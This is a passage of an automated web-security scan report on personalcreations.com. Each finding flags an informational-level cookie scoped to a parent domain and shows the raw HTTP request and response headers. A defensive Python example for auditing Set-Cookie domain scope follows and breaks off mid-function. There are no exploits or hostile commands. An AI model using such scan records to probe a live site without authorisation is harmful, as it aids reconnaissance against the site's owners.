Content-Length: 411135

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.60. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-birthday-gifts-her-PHERBIR

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-birthday-gifts-her-PHERBIR HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM?0&9/3/2011 6:29:35 PM?0&9/3/2011 6:30:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:12 GMT
Connection: close
Content-Length: 318870

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.61. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-business-gifts-PBIZGFT

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-business-gifts-PBIZGFT HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:37 PM?0&9/3/2011 6:20:23 PM?0&9/3/2011 6:20:48 PM?0&9/3/2011 6:20:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:45 GMT
Connection: close
Content-Length: 189636

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.62. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-christmas-gifts-PCHRBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-christmas-gifts-PCHRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:10 GMT
Connection: close
Content-Length: 418054

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.63. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-communion-gifts-PCOMMUN

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-communion-gifts-PCOMMUN HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:21:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:19 GMT
Connection: close
Content-Length: 259238

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.64. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-congratulations-gifts-PCONGRA

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-congratulations-gifts-PCONGRA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM?0&9/3/2011 6:19:52 PM?0&9/3/2011 6:19:56 PM?0&9/3/2011 6:20:33 PM?0&9/3/2011 6:20:09 PM?0&9/3/2011 6:21:18 PM?0&9/3/2011 6:21:00 PM?0&9/3/2011 6:20:59 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:59 GMT
Connection: close
Content-Length: 404968

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.65. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-graduation-gifts-PGRADUA

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-graduation-gifts-PGRADUA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM?0&9/3/2011 6:22:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:22:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:05 GMT
Connection: close
Content-Length: 351790

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.66. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-clothes-PHALAPP

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-halloween-clothes-PHALAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:20:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:14 GMT
Connection: close
Content-Length: 333277

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.67. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-gifts-PHALLOW

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: ProductDetail_RecentlyViewed_PCR in the response below is set with domain=.personalcreations.com, so it is sent to every host under personalcreations.com rather than only to www.personalcreations.com. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; review its contents to determine its function. The cookie is set without Secure or HttpOnly, and the accompanying CURRENTSESSION_ cookie carries domain=.proflowers.com, which does not cover the issuing host and is therefore rejected by an RFC 6265 browser.

Request

GET /personalized-halloween-gifts-PHALLOW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:18:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:54 GMT
Connection: close
Content-Length: 211789

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.68. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-treat-bags-PHALBAG

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: ProductDetail_RecentlyViewed_PCR in the response below is set with domain=.personalcreations.com, so it is sent to every host under personalcreations.com rather than only to www.personalcreations.com. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; review its contents to determine its function. The cookie is set without Secure or HttpOnly, and the accompanying CURRENTSESSION_ cookie carries domain=.proflowers.com, which does not cover the issuing host and is therefore rejected by an RFC 6265 browser.

Request

GET /personalized-halloween-treat-bags-PHALBAG HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:35 GMT
Connection: close
Content-Length: 110641

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.69. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-housewarming-gifts-PHOUSEW

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: ProductDetail_RecentlyViewed_PCR in the response below is set with domain=.personalcreations.com, so it is sent to every host under personalcreations.com rather than only to www.personalcreations.com. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; review its contents to determine its function. The cookie is set without Secure or HttpOnly, and the accompanying CURRENTSESSION_ cookie carries domain=.proflowers.com, which does not cover the issuing host and is therefore rejected by an RFC 6265 browser.

Request

GET /personalized-housewarming-gifts-PHOUSEW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:21:26 PM?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:22:13 PM?0&9/3/2011 6:22:11 PM?0&9/3/2011 6:22:27 PM?0&9/3/2011 6:22:29 PM?0&9/3/2011 6:22:58 PM?0&9/3/2011 6:22:53 PM?0&9/3/2011 6:22:44 PM?0&9/3/2011 6:23:35 PM?0&9/3/2011 6:23:24 PM?0&9/3/2011 6:23:47 PM?0&9/3/2011 6:24:04 PM?0&9/3/2011 6:23:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:23:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:23:35 GMT
Connection: close
Content-Length: 319449

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.70. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-pet-gifts-PPETBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: ProductDetail_RecentlyViewed_PCR in the response below is set with domain=.personalcreations.com, so it is sent to every host under personalcreations.com rather than only to www.personalcreations.com. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; review its contents to determine its function. The cookie is set without Secure or HttpOnly, and the accompanying CURRENTSESSION_ cookie carries domain=.proflowers.com, which does not cover the issuing host and is therefore rejected by an RFC 6265 browser.

Request

GET /personalized-pet-gifts-PPETBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:30 GMT
Connection: close
Content-Length: 268297

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.71. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-romantic-gifts-PLARBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: ProductDetail_RecentlyViewed_PCR in the response below is set with domain=.personalcreations.com, so it is sent to every host under personalcreations.com rather than only to www.personalcreations.com. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; review its contents to determine its function. The cookie is set without Secure or HttpOnly, and the accompanying CURRENTSESSION_ cookie carries domain=.proflowers.com, which does not cover the issuing host and is therefore rejected by an RFC 6265 browser.

Request

GET /personalized-romantic-gifts-PLARBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:27 PM?0&9/3/2011 6:29:17 PM?0&9/3/2011 6:29:16 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:16 GMT
Connection: close
Content-Length: 310128

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
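The parent-domain scoping reported in 11.66 through 11.71 can be checked mechanically rather than by eye. The Python below is an added example and is not part of the XSS.CX report or of the scanner that produced it: it splits a Set-Cookie header the way RFC 6265 §5.2 describes, applies the §5.1.3 domain-match rule to decide whether a browser would store the cookie for the issuing host at all, and flags a Domain attribute that is wider than that host, together with missing Secure and HttpOnly. The sample headers are copied from the 11.71 response with the long timestamp value shortened; the function and variable names are the example's own.

```python
"""Audit Set-Cookie headers for domain scope wider than the issuing host.

Added example, not code from the report. Sample input below is copied from
the response in finding 11.71 (cookie values abbreviated).
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: issuing host and its Set-Cookie headers (values shortened).
ISSUING_HOST = "www.personalcreations.com"
SAMPLE_SET_COOKIE = [
    "CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/",
    "PCR_SelectedProducts=; path=/",
    "ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM&; "
    "domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:16 GMT; path=/",
]


@dataclass
class CookieScope:
    name: str
    domain: Optional[str]      # normalised Domain attribute, None for a host-only cookie
    path: str
    secure: bool
    httponly: bool
    accepted: bool             # would an RFC 6265 browser store it for the issuing host?
    scoped_to_parent: bool     # Domain covers hosts beyond the issuing host
    notes: List[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> Tuple[str, str, Dict[str, str]]:
    """Return (name, value, attributes). Only ';' separates fields, so the
    '&', '?' and ':' characters inside the report's cookie values are kept
    verbatim. Attribute names are case-insensitive (RFC 6265 §5.2)."""
    parts = header.split(";")
    name, _, value = parts[0].strip().partition("=")
    attrs: Dict[str, str] = {}
    for raw in parts[1:]:
        key, _, val = raw.strip().partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def domain_matches(host: str, domain: str) -> bool:
    """RFC 6265 §5.1.3: host equals domain, or host ends with '.' + domain
    and host is not an IP address."""
    host, domain = host.lower(), domain.lower()
    if host == domain:
        return True
    return host.endswith("." + domain) and not host.replace(".", "").isdigit()


def check_cookie(header: str, host: str) -> CookieScope:
    """Classify one Set-Cookie header as seen from `host`."""
    name, _value, attrs = parse_set_cookie(header)
    secure, httponly = "secure" in attrs, "httponly" in attrs
    path = attrs.get("path", "/")
    raw_domain = attrs.get("domain")
    if not raw_domain:
        # No Domain attribute: host-only cookie, returned only to `host`.
        return CookieScope(name, None, path, secure, httponly, True, False)
    # Browsers drop one leading dot before matching (RFC 6265 §5.2.3).
    # This check does not consult the Public Suffix List, so a Domain such
    # as "com" would be reported as parent-scoped rather than rejected.
    domain = raw_domain.lstrip(".").lower()
    notes: List[str] = []
    accepted = domain_matches(host, domain)
    if not accepted:
        notes.append(f"Domain={raw_domain} does not cover {host}; a compliant browser rejects it")
    scoped_to_parent = accepted and domain != host.lower()
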